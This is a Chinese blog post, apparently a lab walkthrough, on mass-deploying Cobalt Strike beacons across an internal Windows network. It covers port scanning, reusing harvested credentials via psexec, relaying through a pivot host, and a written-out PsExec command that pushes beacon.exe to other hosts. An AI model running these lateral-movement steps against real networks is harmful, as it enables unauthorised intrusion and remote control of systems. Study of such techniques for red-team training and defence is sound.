cobal strike内网批量上线

Writing
创建时间:
阅读:
  1. 前言
  2. 环境
  3. 内网可出网
  4. 内网不可出网
  5. 参考链接

前言

晚上临睡之前,发现一篇教cs批量上线的博客。看的不错,手动重演了一遍
timg?image&quality=80&size=b9999_10000&sec=1578283165678&di=951ef97bc927669d5027bfc448699a57&imgtype=0&src=http%3A%2F%2Fb-ssl.duitang.com%2Fuploads%2Fitem%2F201802%2F15%2F20180215122832_A4T5H.jpeg

环境

环境:

windows 2008:192.168.241.171
windows 2008 x2:192.168.241.172
windows 7:192.168.241.156

内网可出网

首先windows7上线了,执行一波portscan
lrBiFK.png

点击视图->目标可以看到扫出来开发的机子
lrBeOA.png

获取登录密码通过cs自带的psexec执行ipc$批量
lrBaT0.png

选中要进行测试的机子
lrB0YT.png

选择对应的凭证
lrBXAP.png

选择会话(补图)
lrDiBn.png

等上线就好
lrDWuj.png

内网不可出网

先将可出网的一台机设置中转
lrreat.png

lrrKG8.png

生成马子,把马子和PsExec传到出网的机子上,之后用PsExec执行命令

PsExec.exe -accepteula \\192.168.241.171,192.168.241.172 -u Administrator -p xxxxx -d -c C:\Windows\Temp\beacon.exe

lrrDsJ.png

等上线
lrr2i6.png

在上线成功的机子上可以看到是通过192.168.241.156这台机的4444端口流量出网的
lrr4Qe.png

ssh批量登录的方法和图1差不多

参考链接

CobaltStrike进阶篇-批量上线 | AnonySec’Blog

转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。

文章标题:cobal strike内网批量上线

本文作者:九世

发布时间:2020-01-06, 09:05:02

最后更新:2020-01-06, 09:38:46

原始链接:http://jiushill.github.io/posts/b9889b8f.html

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

©2016-2019 Yelog

Built with Hexo and 3-hexo theme

目录